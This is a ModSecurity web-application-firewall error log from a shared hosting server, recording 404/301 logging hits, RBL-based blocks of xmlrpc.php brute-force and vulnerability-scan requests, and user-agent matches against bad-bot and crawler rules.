[Tue May 26 16:01:53.647110 2026] [security2:error] [pid 762634:tid 762847] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2mbx8rj1VZMqUAOd1SwAAAFM"]
[Tue May 26 16:01:53.786550 2026] [security2:error] [pid 762634:tid 762876] [client 147.53.116.161:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2mbx8rj1VZMqUAOd1TwAAAHA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444213&moderation-hash=cf7c3b65b52cdda8d8446a1b2d77e521
[Tue May 26 16:01:54.165117 2026] [security2:error] [pid 762634:tid 762766] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2mbx8rj1VZMqUAOd1WQAAAAI"], referer: https://jhonweb.com/manifest.json
[Tue May 26 16:01:54.562399 2026] [security2:error] [pid 762634:tid 762871] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2mrx8rj1VZMqUAOd1XAAAAGs"]
[Tue May 26 16:01:54.746708 2026] [security2:error] [pid 762634:tid 762830] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2mrx8rj1VZMqUAOd1agAAAEI"]
[Tue May 26 16:01:55.461533 2026] [security2:error] [pid 762634:tid 762852] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2m7x8rj1VZMqUAOd1dgAAAFg"], referer: https://jhonweb.com/build-manifest.json
[Tue May 26 16:01:56.223797 2026] [security2:error] [pid 762634:tid 762820] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2nLx8rj1VZMqUAOd1jwAAADg"]
[Tue May 26 16:01:56.638891 2026] [security2:error] [pid 762634:tid 762891] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2nLx8rj1VZMqUAOd1lQAAAH8"]
[Tue May 26 16:01:56.950795 2026] [security2:error] [pid 762634:tid 762833] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2nLx8rj1VZMqUAOd1nAAAAEU"], referer: https://jhonweb.com/_next/static/buildManifest.js
[Tue May 26 16:01:57.322440 2026] [security2:error] [pid 762634:tid 762871] [client 106.219.85.83:26946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2nbx8rj1VZMqUAOd1qgAAAGs"]
[Tue May 26 16:01:57.322556 2026] [security2:error] [pid 762634:tid 762871] [client 106.219.85.83:26946] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2nbx8rj1VZMqUAOd1qgAAAGs"]
[Tue May 26 16:01:57.517881 2026] [security2:error] [pid 762634:tid 762797] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2nbx8rj1VZMqUAOd1rgAAACE"]
[Tue May 26 16:01:58.234257 2026] [security2:error] [pid 762634:tid 762827] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2nrx8rj1VZMqUAOd1xwAAAD8"], referer: https://jhonweb.com/_next/build-manifest.json
[Tue May 26 16:01:58.575401 2026] [security2:error] [pid 762634:tid 762802] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2nrx8rj1VZMqUAOd10QAAACY"]
[Tue May 26 16:01:59.381289 2026] [security2:error] [pid 762634:tid 762798] [client 103.44.52.196:60164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2n7x8rj1VZMqUAOd1_wAAACI"]
[Tue May 26 16:01:59.381422 2026] [security2:error] [pid 762634:tid 762798] [client 103.44.52.196:60164] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2n7x8rj1VZMqUAOd1_wAAACI"]
[Tue May 26 16:01:59.580540 2026] [security2:error] [pid 762634:tid 762794] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2n7x8rj1VZMqUAOd2AAAAAB4"]
[Tue May 26 16:02:00.528328 2026] [security2:error] [pid 762634:tid 762886] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2oLx8rj1VZMqUAOd2HQAAAHo"], referer: https://jhonweb.com/.next/build-manifest.json
[Tue May 26 16:02:00.802300 2026] [security2:error] [pid 762634:tid 762853] [client 147.53.116.161:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2oLx8rj1VZMqUAOd2MgAAAFk"], referer: https://anujtradingco.com
[Tue May 26 16:02:01.061198 2026] [security2:error] [pid 762634:tid 762771] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2oLx8rj1VZMqUAOd2NwAAAAc"]
[Tue May 26 16:02:01.145069 2026] [security2:error] [pid 762634:tid 762826] [client 107.152.32.177:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2obx8rj1VZMqUAOd2PgAAAD4"], referer: https://www.anujtradingco.com/
[Tue May 26 16:02:01.282783 2026] [security2:error] [pid 762634:tid 762788] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2oLx8rj1VZMqUAOd2NgAAABg"]
[Tue May 26 16:02:01.580529 2026] [security2:error] [pid 762634:tid 762817] [client 107.152.32.177:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2obx8rj1VZMqUAOd2TgAAADU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1431426&moderation-hash=1e747c409850b73d8430cd58dafc9cc5
[Tue May 26 16:02:01.659541 2026] [security2:error] [pid 762634:tid 762847] [client 103.153.130.62:55897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2obx8rj1VZMqUAOd2TwAAAFM"]
[Tue May 26 16:02:01.659675 2026] [security2:error] [pid 762634:tid 762847] [client 103.153.130.62:55897] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2obx8rj1VZMqUAOd2TwAAAFM"]
[Tue May 26 16:02:02.829362 2026] [security2:error] [pid 762634:tid 762877] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2orx8rj1VZMqUAOd2bgAAAHE"]
[Tue May 26 16:02:02.836048 2026] [security2:error] [pid 762634:tid 762884] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2orx8rj1VZMqUAOd2cQAAAHg"], referer: https://jhonweb.com/build/manifest.json
[Tue May 26 16:02:03.235329 2026] [security2:error] [pid 762634:tid 762881] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2o7x8rj1VZMqUAOd2fgAAAHU"]
[Tue May 26 16:02:03.814961 2026] [security2:error] [pid 762634:tid 762813] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2o7x8rj1VZMqUAOd2lAAAADE"], referer: https://jhonweb.com/.vite/manifest.json
[Tue May 26 16:02:04.761178 2026] [security2:error] [pid 762634:tid 762782] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2pLx8rj1VZMqUAOd2qQAAABI"]
[Tue May 26 16:02:04.994433 2026] [security2:error] [pid 762634:tid 762800] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV2pLx8rj1VZMqUAOd2vgAAACQ"]
[Tue May 26 16:02:04.994949 2026] [security2:error] [pid 762634:tid 762881] [client 35.175.92.196:51546] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV2pLx8rj1VZMqUAOd2vAAAAHU"]
[Tue May 26 16:02:05.202966 2026] [security2:error] [pid 762634:tid 762880] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV2pbx8rj1VZMqUAOd2xQAAAHQ"]
[Tue May 26 16:02:05.203606 2026] [security2:error] [pid 762634:tid 762815] [client 35.175.92.196:38058] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV2pbx8rj1VZMqUAOd2wwAAADM"]
[Tue May 26 16:02:05.381039 2026] [security2:error] [pid 762634:tid 762790] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2pbx8rj1VZMqUAOd2xgAAABo"]
[Tue May 26 16:02:05.609935 2026] [security2:error] [pid 762634:tid 762842] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/index.html"] [unique_id "ahV2pbx8rj1VZMqUAOd21gAAAE4"]
[Tue May 26 16:02:05.610676 2026] [security2:error] [pid 762634:tid 762868] [client 35.175.92.196:38074] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahV2pbx8rj1VZMqUAOd21AAAAGg"]
[Tue May 26 16:02:06.552292 2026] [security2:error] [pid 762634:tid 762770] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2prx8rj1VZMqUAOd26gAAAAY"], referer: https://jhonweb.com/dist/manifest.json
[Tue May 26 16:02:06.952080 2026] [security2:error] [pid 762634:tid 762889] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2prx8rj1VZMqUAOd2-QAAAH0"]
[Tue May 26 16:02:07.105664 2026] [security2:error] [pid 762634:tid 762776] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2prx8rj1VZMqUAOd3AAAAAAw"]
[Tue May 26 16:02:07.741748 2026] [security2:error] [pid 762634:tid 762823] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2p7x8rj1VZMqUAOd3GAAAADs"], referer: https://jhonweb.com/dist/.vite/manifest.json
[Tue May 26 16:02:07.743240 2026] [security2:error] [pid 762634:tid 762873] [client 106.219.85.83:3813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2p7x8rj1VZMqUAOd3IAAAAG0"]
[Tue May 26 16:02:07.743329 2026] [security2:error] [pid 762634:tid 762873] [client 106.219.85.83:3813] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2p7x8rj1VZMqUAOd3IAAAAG0"]
[Tue May 26 16:02:08.173732 2026] [security2:error] [pid 762634:tid 762764] [client 87.106.152.203:58375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.anujoverseas.in"] [uri "/images/images/cache.php"] [unique_id "ahV2qLx8rj1VZMqUAOd3LQAAAAA"], referer: www.google.com
[Tue May 26 16:02:08.434537 2026] [security2:error] [pid 762634:tid 762818] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2qLx8rj1VZMqUAOd3JQAAADY"]
[Tue May 26 16:02:08.917838 2026] [security2:error] [pid 762634:tid 762774] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2qLx8rj1VZMqUAOd3SAAAAAo"]
[Tue May 26 16:02:09.450932 2026] [security2:error] [pid 762634:tid 762820] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2qbx8rj1VZMqUAOd3ZAAAADg"], referer: https://jhonweb.com/_nuxt/manifest.json
[Tue May 26 16:02:10.022393 2026] [security2:error] [pid 762634:tid 762771] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2qbx8rj1VZMqUAOd3dgAAAAc"]
[Tue May 26 16:02:10.704436 2026] [security2:error] [pid 762634:tid 762832] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2qrx8rj1VZMqUAOd3iAAAAEQ"], referer: https://jhonweb.com/_nuxt/builds/latest.json
[Tue May 26 16:02:11.136207 2026] [security2:error] [pid 762634:tid 762876] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2qrx8rj1VZMqUAOd3jgAAAHA"]
[Tue May 26 16:02:11.583696 2026] [security2:error] [pid 762634:tid 762859] [client 34.147.28.155:40960] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahV2q7x8rj1VZMqUAOd3owAAAF8"]
[Tue May 26 16:02:11.583851 2026] [security2:error] [pid 762634:tid 762859] [client 34.147.28.155:40960] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahV2q7x8rj1VZMqUAOd3owAAAF8"]
[Tue May 26 16:02:12.093484 2026] [security2:error] [pid 762634:tid 762776] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2q7x8rj1VZMqUAOd3sAAAAAw"]
[Tue May 26 16:02:12.160737 2026] [security2:error] [pid 762634:tid 762861] [client 103.153.130.62:56185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2rLx8rj1VZMqUAOd3sQAAAGE"]
[Tue May 26 16:02:12.160909 2026] [security2:error] [pid 762634:tid 762861] [client 103.153.130.62:56185] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2rLx8rj1VZMqUAOd3sQAAAGE"]
[Tue May 26 16:02:12.665663 2026] [security2:error] [pid 762634:tid 762802] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2rLx8rj1VZMqUAOd3vAAAACY"], referer: https://jhonweb.com/.astro/manifest.json
[Tue May 26 16:02:13.111229 2026] [security2:error] [pid 762634:tid 762769] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2rLx8rj1VZMqUAOd3xAAAAAU"]
[Tue May 26 16:02:13.400447 2026] [security2:error] [pid 762634:tid 762887] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2rbx8rj1VZMqUAOd31AAAAHs"]
[Tue May 26 16:02:13.592119 2026] [security2:error] [pid 762634:tid 762880] [client 103.44.52.196:56194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2rbx8rj1VZMqUAOd32gAAAHQ"]
[Tue May 26 16:02:13.592258 2026] [security2:error] [pid 762634:tid 762880] [client 103.44.52.196:56194] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2rbx8rj1VZMqUAOd32gAAAHQ"]
[Tue May 26 16:02:14.427310 2026] [security2:error] [pid 762634:tid 762805] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2rrx8rj1VZMqUAOd38gAAACk"], referer: https://jhonweb.com/static/manifest.json
[Tue May 26 16:02:15.129886 2026] [security2:error] [pid 762634:tid 762799] [client 74.7.241.184:49240] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "www.api.dezka.mx"] [uri "/robots.txt"] [unique_id "ahV2r7x8rj1VZMqUAOd4EwAAI0Y"]
[Tue May 26 16:02:15.209686 2026] [security2:error] [pid 762634:tid 762870] [client 74.7.241.184:49240] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.api.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahV2r7x8rj1VZMqUAOd4FQAAaks"], referer: https://www.api.dezka.mx/robots.txt
[Tue May 26 16:02:15.308036 2026] [security2:error] [pid 762634:tid 762876] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2rrx8rj1VZMqUAOd4CAAAAHA"]
[Tue May 26 16:02:15.374499 2026] [security2:error] [pid 762634:tid 762809] [client 46.6.56.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2rrx8rj1VZMqUAOd4DAAAAC0"]
[Tue May 26 16:02:15.398348 2026] [security2:error] [pid 762634:tid 762840] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2r7x8rj1VZMqUAOd4GQAAAEw"]
[Tue May 26 16:02:15.939162 2026] [security2:error] [pid 762634:tid 762845] [client 85.208.96.206:17784] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/list/"] [unique_id "ahV2r7x8rj1VZMqUAOd4JwAAAFE"]
